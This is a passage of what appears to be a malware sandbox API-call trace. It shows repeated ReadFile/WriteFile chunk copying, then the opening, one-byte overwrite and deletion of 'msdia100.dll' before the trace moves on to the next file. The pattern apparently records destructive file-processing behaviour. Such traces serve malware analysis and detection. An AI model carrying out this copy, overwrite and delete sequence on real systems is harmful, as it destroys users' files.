nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.049] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.049] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.049] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.049] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.049] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.049] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.050] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.050] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.050] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.050] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.050] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.050] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.059] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.059] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.059] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.059] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.059] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.060] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.061] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.062] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.063] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.063] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.063] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.063] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.063] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.063] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.063] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.064] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.065] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.066] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.066] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.066] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.066] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.066] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.066] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.066] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.067] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.067] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.067] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.067] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.068] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.068] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.069] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.069] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.069] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.069] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.069] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0xb50, lpOverlapped=0x0) returned 1 [0103.069] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.069] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0103.069] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0xb50, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327ef70*=0xb50, lpOverlapped=0x0) returned 1 [0103.070] CloseHandle (hObject=0x27c) returned 1 [0103.070] CloseHandle (hObject=0x368) returned 1 [0103.070] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.079] GetFileType (hFile=0x368) returned 0x1 [0103.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0103.079] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0103.080] CloseHandle (hObject=0x368) returned 1 [0103.080] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll")) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0103.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.081] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe87c00, ftCreationTime.dwHighDateTime=0x1cbfe36, ftLastAccessTime.dwLowDateTime=0x2ce22546, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0xcfe87c00, ftLastWriteTime.dwHighDateTime=0x1cbfe36, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0x1, dwReserved1=0x0, cFileName="msdia90.dll", cAlternateFileName="")) 